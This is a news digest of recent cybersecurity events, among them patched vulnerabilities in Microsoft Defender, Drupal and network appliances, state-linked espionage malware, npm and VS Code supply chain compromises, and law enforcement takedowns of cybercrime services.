Microsoft has released security updates for two Microsoft Defender vulnerabilities that have been actively exploited in zero-day attacks. The first flaw, tracked as CVE-2026-41091, affects Microsoft Malware Protection Engine version 1.1.26030.3008 and earlier. A second issue (CVE-2026-45498) impacts systems running Microsoft Defender Antimalware Platform version 4.18.26030.3011 and earlier. The vendor has also patched a critical remote execution flaw (CVE-2026-45584) in Malware Protection Engine, caused by a boundary error issue. Currently, there’s no indication that the latter vulnerability is being exploited in the wild.
Separately, Microsoft released a mitigation for a BitLocker bypass vulnerability (CVE-2026-45585) aka YellowKey after a proof-of-concept was made public last week. The flaw affects Windows 11 version 26H1 for x64-based Systems, Windows 11 Version 24H2 for x64-based Systems, Windows 11 Version 25H2 for x64-based Systems, Windows Server 2025, and Windows Server 2025 (Server Core installation).
The US Cybersecurity and Infrastructure Security Agency (CISA) has also flagged CVE-2026-41091 and CVE-2026-45498 as actively exploited, along with a number of older vulnerabilities affecting MS Explorer (CVE-2010-0249, CVE-2010-0806), MS Windows (CVE-2008-4250), MS DirectX (CVE-2009-1537), and Adobe Acrobat (CVE-2009-3459).
Drupal maintainers issued security updates to address an SQL-injection vulnerability (CVE-2026-9082) in Drupal API. Only sites using PostgreSQL databases are vulnerable. Anonymous exploitation is possible. Successful exploitation can lead to information disclosure and, in some cases, privilege escalation or remote code execution.
F5 has released security updates to fix a number of vulnerabilities in the NGINX HTTP web server that can be exploited to trigger the denial-of-service (DoS) condition or used for remote code execution.
Ivanti, Fortinet, VMware, and n8n released patches for multiple critical vulnerabilities that could allow authentication bypass, remote code execution, SQL injection, and privilege escalation. The list of the most important issues include Ivanti Xtraction flaw (CVE-2026-8043), Fortinet flaws (CVE-2026-44277 and CVE-2026-26083), VMware Fusion flaw (CVE-2026-41702), and several critical n8n vulnerabilities (CVE-2026-42231, CVE-2026-42232, CVE-2026-44789, CVE-2026-44790, and CVE-2026-44791) that could lead to remote code execution and full system compromise.
Hackers are exploiting a critical flaw (CVE-2024-9643) in Four-Faith industrial routers to create botnets. Security researchers at CrowdSec report a major increase in attacks, showing that hackers have moved from testing the vulnerability to large-scale exploitation. The attacks are coming from multiple countries, including the UK, Germany, the US, and the Netherlands.
Researchers at ReliaQuest warn that hackers are actively exploiting the SonicWall vulnerability (CVE-2024-12802) in real-world attacks. ReliaQuest found that some devices were still vulnerable even after updating the firmware because extra remediation steps were not completed. However, for SonicWall Gen7 and Gen8 devices, installing the latest firmware update alone is enough to fully fix the issue.
Russian state-linked cyber-espionage group, tracked as Secret Blizzard, Turla, Uroburos, and Venomous Bear, has upgraded its Kazuar malware, transforming the backdoor into a modular peer-to-peer (P2P) botnet designed for stealth, persistence, and intelligence collection.
Ukraine’s cybersecurity response team CERT-UA has issued a security advisory detailing phishing attacks against government organizations. Attackers send fake emails with PDF links that download malicious files and malware, including OYSTERFRESH, OYSTERBLUES, OYSTERSHUCK, and Cobalt Strike. The campaign is linked to the Belarus-affiliated UAC-0057 (aka UNC1151, Ghostwriter, Storm-0257) hacking group.
A previously undocumented malware implant dubbed 'TencShell' was spotted in an attack on an unnamed global manufacturing company. The activity was traced to a third-party user connection into the customer’s India-based environment. TencShell appears to be the work of a Chinese-affiliated threat actor, though there’s not enough evidence for definitive attribution.
Darktrace researchers have uncovered a suspected China-nexus cyber-espionage campaign linked to the Twill Typhoon threat group targeting organizations across the Asia-Pacific and Japan (APJ) region. The operation, first observed in late September 2025, leveraged CDN impersonation, DLL sideloading, and modular malware delivery to deploy a sophisticated .NET-based remote access trojan (RAT).
A China-aligned advanced persistent threat group, tracked as Webworm, has been updating its arsenal with new custom tools and backdoors since 2025. According to ESET, Webworm, previously associated with China-linked groups SixLittleMonkeys and FishMonger, has shifted from the McRat (9002 RAT) and Trochilus remote access trojans to lightweight proxy infrastructure and cloud-based command-and-control (C&C) mechanisms designed to evade detection.
Lumen’s Black Lotus Labs discovered a new Linux malware family called Showboat that targets telecommunications organizations in several regions. The malware is a modular tool that can remotely control infected systems, transfer files, and act as a Socks5 proxy. Researchers found that the campaign affected a telecom provider in the Middle East and used fake telecom company identities in Southeast Asia. The activity is linked to at least one, and likely several, China-aligned threat groups.
Cybersecurity firm Seqrite Labs has released a report on a spear phishing campaign targeting Chinese educational sector. The campaign, dubbed Operation Dragon Whistle, has been attributed to a threat actor the company tracks as UNG0002.
The Fast16 malware platform appears to have been engineered for the manipulation of nuclear weapons simulations inside advanced engineering software used for high-explosive modeling. The most recent analysis by Symantec linked the malware directly to LS-DYNA and Autodyn, two industrial simulation suites widely used for modeling detonations, material stress, and implosion physics.
Google Threat Intelligence Group (GTIG) details a cybercrime group called UNC6671 aka “BlackFile.” The group uses voice phishing (vishing) and fake login pages to steal employee credentials and bypass multi-factor authentication (MFA). The threat actor mainly targets Microsoft 365 and Okta systems, using scripts to steal sensitive company data and then extort organizations. Since early 2026, UNC6671 has attacked dozens of companies in North America, Australia, and the UK. Although the group has sometimes used the ShinyHunters name, GTIG believes UNC6671 operates independently with its own tools, domains, and BlackFile leak site.
Cybercriminals are still exploiting MSHTA, an old Windows tool that can run scripts from local or online files, Bitdefender researchers warn. Attackers use it as part of “living off the land” tactics to spread malware like password stealers and advanced threats. Recent campaigns included fake Google ads for Claude Code, ClickFix attacks delivering LummaStealer and CastleLoader, and malware hidden in pirated downloads.
Grafana has disclosed that an unauthorized party has gained access to its GitHub environment after obtaining a compromised token, allowing the attacker to download the company’s codebase. The breach was caused by a TanStack npm supply chain attack via the Mini Shai-Hulud campaign. The company said that threat actors downloaded some source code and GitHub repositories that some Grafana Labs teams use for business communication.
Microsoft said it discovered an active supply chain attack targeting the @antv node package manager (npm) package ecosystem. A threat actor compromised an @antv maintainer account and published malicious versions of widely used data-visualization packages, resulting in cascading downstream impact.
GitHub has confirmed that around 3,800 internal repositories were compromised after an employee installed a malicious Visual Studio Code extension. The TeamPCP hacker group took responsibility for the breach on the Breached cybercrime forum earlier this week. The group claimed it had obtained access to GitHub source code and roughly 4,000 private repositories, demanding at least $50,000 for the stolen data.
A new variant of the SHub macOS infostealer is using AppleScript and fake security prompts to infect users’ systems and install a persistent backdoor. The updated malware, dubbed “Reaper,” targets macOS users via fake installers for popular applications including WeChat and Miro.
An international law enforcement operation has dismantled a VPN service widely used by cybercriminals to hide ransomware attacks, data theft, and large-scale fraud. The service, known as “First VPN,” had been promoted for years on Russian-speaking cybercrime forums as a secure way for criminals to evade law enforcement via anonymous payments and hidden infrastructure.
Additionally, the US FBI has released a FLASH alert with indicators of compromise (IoCs) and identified tactics, techniques, and procedures (TTPs) associated with the First VPN Service. The service has been active since around 2014 and currently provides 32 exit node servers in 27 countries, the FBI said, noting that at least 25 ransomware groups, such as Avaddon Ransomware, have used First VPN Service infrastructure for network reconnaissance and intrusions.
Microsoft took action against a major cybercrime operation that allowed threat actors to distribute ransomware and other malware through fake code-signing certificates. The company said a threat actor it tracks as Fox Tempest operated a malware-signing-as-a-service (MSaaS) platform that abused Microsoft Artifact Signing to generate short-term certificates that allowed malware to appear as legitimate software.
A large-scale cybercrime crackdown, codenamed “Operation Ramz,” across the Middle East and North Africa (MENA) has resulted in 201 arrests and the identification of 382 additional suspects linked to phishing, malware, and online fraud schemes.
Conducted between October 2025 and February 2026, the operation involved law enforcement agencies from 13 countries aiming to dismantle malicious cyber infrastructure and disrupt phishing campaigns.
US authorities charged Jacob Butler, a 23-year-old Canadian national, with running the KimWolf DDoS botnet that infected more than one million internet-connected devices worldwide. The charges were unsealed after Butler was arrested in Canada. KimWolf was a DDoS-for-hire operation that allowed users to launch cyberattacks; it was shut down in March 2026 along with the Aisuru, JackSkid, and Mossad IoT botnets.
Two former business executives, Adam Young and Harrison Gevirtz, pleaded guilty for helping international tech-support scam operations. Their company provided phone and call-routing services to scammers who tricked victims into paying for fake technical support and, in some cases, stole personal information. Prosecutors said the executives knew about the illegal activity for years, helped scammers avoid detection, and connected them with other service providers. Both pleaded guilty to concealing known criminal activity. Their sentencing is set for June 16, 2026.
Ukrainian authorities have detained an 18-year-old man suspected of involvement with an international cybercrime crew that compromised nearly 30,000 customer accounts linked to a US online retailer. The group used info-stealing malware to collect login credentials and session data, which were later sold through online platforms and Telegram channels. The suspect is accused of managing the infrastructure used to process and sell the stolen data and of handling cryptocurrency transactions.
The US National Security Agency (NSA) has released security design considerations for AI-driven automation leveraging MCP which, while simplifying the integration of diverse capabilities into powerful agent workflows, requires caution.